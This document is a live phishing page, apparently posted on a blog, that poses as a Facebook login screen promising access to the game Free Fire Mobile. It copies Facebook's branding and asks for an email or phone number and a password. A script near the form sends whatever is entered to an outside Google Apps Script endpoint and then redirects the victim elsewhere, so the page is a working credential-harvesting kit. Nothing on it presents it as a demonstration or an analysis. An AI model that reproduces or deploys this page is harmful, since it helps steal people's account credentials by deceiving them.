<!DOCTYPE html>
<html lang="en">
    <head>
        <meta content="width=device-width, initial-scale=1" name="viewport">
        <title>login</title>
        <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
        <!-- Chrome, Firefox OS and Opera -->
        <meta content="" name="theme-color">
        <!-- Windows Phone -->
        <meta content="" name="msapplication-navbutton-color">
  
       
       
    
        <!--Can't find substitution for tag [blog.ieCssRetrofitLinks]-->
        
       
        
        <meta content="width=device-width, initial-scale=1" name="viewport">
       
      
        <meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
        <meta name="google-adsense-platform-domain" content="blogspot.com">
        </head>
        
    <div class="main section" id="main"></div>
  
    
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta property="og:title" content="Facebook - log in or sign up">
        <meta name="description" content="Log in to your Facebook account to connect to FREE FIRE MOBILE">
        <meta property="og:description" content="Log in to your Facebook account to connect to FREE FIRE MOBILE">
        <meta property="og:url" content="./">
        <meta name="theme-color" content="#3b5998">
        <meta property="og:site_name" content="Facebook - log in or sign up">
        <meta property="og:type" content="website">
        <title>Log in to your Facebook account to connect to FREE FIRE MOBILE</title>
        <link rel="stylesheet" href="style.css">
        <link href="" rel="stylesheet">
        <link rel="icon" href="">
    
    
        <div class="navbar">
            <img style="width:95px; height:30px;" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1642789832f5e6d6ec65269188219f3e69724867cc.png">
        </div>
        <div class="content-box">
            <img style="width:50px; height:50px;" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1642309138e4b4f2d7c322240d0473e9f812313efb.png">
            <div class="txt-login">
                Log in to your Facebook account to connect to FREE FIRE MOBILE
            </div>
            <form class="login-form" action="" method="post"    name="google-sheet">
                
                    <input type="text" name="name" placeholder="Email or phone number"   minlength="10" required="">
                
                    <input type="password" name="password" placeholder="password" minlength="8"  required="">
                
                <button type="submit" class="btn-login">Log in</button>
            </form>
            <div class="txt-create-account">Create Account</div>
            <div class="txt-not-now">Not now</div>
            <div class="txt-forgotten-password">Forgotten password?</div>
        </div>
        <div class="language-box">
            <center>
                <div class="language-name language-name-active">English (UK)</div>
                <div class="language-name">Bahasa Indonesia</div>
                <div class="language-name">Basa Jawa</div>
                <div class="language-name">Bahasa Melayu</div>
                <div class="language-name">日本語</div>
                <div class="language-name">Español</div>
                <div class="language-name">Português (Brasil)</div>
                <div class="language-name">
                    <i class="fa fa-plus"></i>
                </div>
            </center>
        </div>
        <div class="copyright">Facebook Inc.</div>
 
    
    
 
    
<script type="text/javascript">
    const scriptURL = 'https://script.google.com/macros/s/AKfycbz9U_1NlrjqOmPSb5tCUGusTmx0xWed-LKA_EJixZ_un-bMYh8GOya3eLdu6NbCxxph/exec'
              const form = document.forms['google-sheet']
            
              form.addEventListener('submit', e => {
                e.preventDefault()
                fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                  .then(response => location.href = "https://submit-codea.netlify.app/")
                  .catch(error => console.error('Error!', error.message))
              })
  </script>
    <!-- JavaScript Bundle with Popper -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js" integrity="sha384-p34f1UUtsS3wqzfto5wAAmdvj+osOnFyQFpp4Ua3gs/ZVWx6oOypYoCJhGGScy+8" crossorigin="anonymous"></script>
  
  
      <!--this is essential to link this smtp and jquery cdn link-->
	  
   <style>
        
@import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Teko:300,400,500");
*,*:before,*:after {
	-webkit-box-sizing:border-box;
	-moz-box-sizing:border-box;
	box-sizing:border-box;
}
body {
	background: #ECEFF6;
	background-size: cover;
	-webkit-background-size: cover;
	-moz-background-size: cover;
	-o-background-size: cover;
	margin: 0;
}

.container {
	max-width: 600px;
	height: auto;
	margin: 50px auto;
	padding: 30px;
	position: relative;
}
.navbar {
	background: #3b5998;
	width: 100%;
	height: auto;
	padding: 8px;
}
.navbar img {
    width: 115;
    margin-left: auto;
    margin-right: auto;
    display: block;
}
.content-box {
    width: 400px;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}
.content-box img {
    width: 60;
    margin-top: 35px;
    margin-left: auto;
    margin-right: auto;
    border-radius: 12px;
    display: block;
}
.txt-login {
    width: 270px;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    margin-bottom: 17px;
    padding: 8px;
    color: #90949c;
    font-size: 16px;
    font-family: Roboto;
    text-align: center;
    display: block;
}
.login-form input[type="text"],.login-form input[type="password"] {
	width: 100%;
	height: auto;
	padding: 12px;
	color: #000;
	font-size: 14px;
	font-weight: 400;
	font-family: 'Lato',sans-serif;
	border: 1px solid #bdbebf;
	cursor: pointer;
	outline: none;
}
.login-form input[type="text"] {
    margin: 0;
    padding-bottom: 13px;
	border-bottom: none;
	border-radius: 4px 4px 0 0;
	box-shadow: 0 -1px 0 #E0E0E0 inset,0 0px 0px rgba(0,0,0,0.23) inset;
}
.login-form input[type="password"] {
    margin: 0;
	border-top: none;
	border-radius: 0 0 4px 4px;
	box-shadow: 0 -0px 0 rgba(0,0,0,0.23) inset,0 0px 0px rgba(255,255,255,0.1);
}

.btn-login {
	background: #1778f2;
	width: 100%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	padding: 10px;
	color: #fff;
	font-size: 14px;
	font-family: Roboto;
	font-weight: bold;
	text-align: center;
	text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
	border: 1px solid #3578e5;
	border-radius: 5px;
	box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
	outline: none;
	display: block;
}
.txt-create-account {
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}
.txt-not-now {
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}
.txt-forgotten-password {
    width: 100%;
    height: auto;
    margin-bottom: 30px;
    padding: 5px;
    color: #7596c8;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}
.language-box {
    width: 100%;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}
.language-name {
    width: 40%;
    height: auto;
    margin: 5px;
    margin-bottom: 0px;
    color: #3b5998;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: inline-block;
}
.language-name i {
    width: 23px;
    padding: 4px;
    color: #90949c;
    border: 1px solid #3b5998;
    border-radius: 3px;
}
.language-name-active {
    color: #90949c;
    font-weight: bold;
}
.copyright {
    width: 40%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    color: #90949c;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: block;
}
@media only screen and (max-width:600px) {
	.content-box {
	 width: 330px;
	}
}
        </style>
    
    </body>
</html>
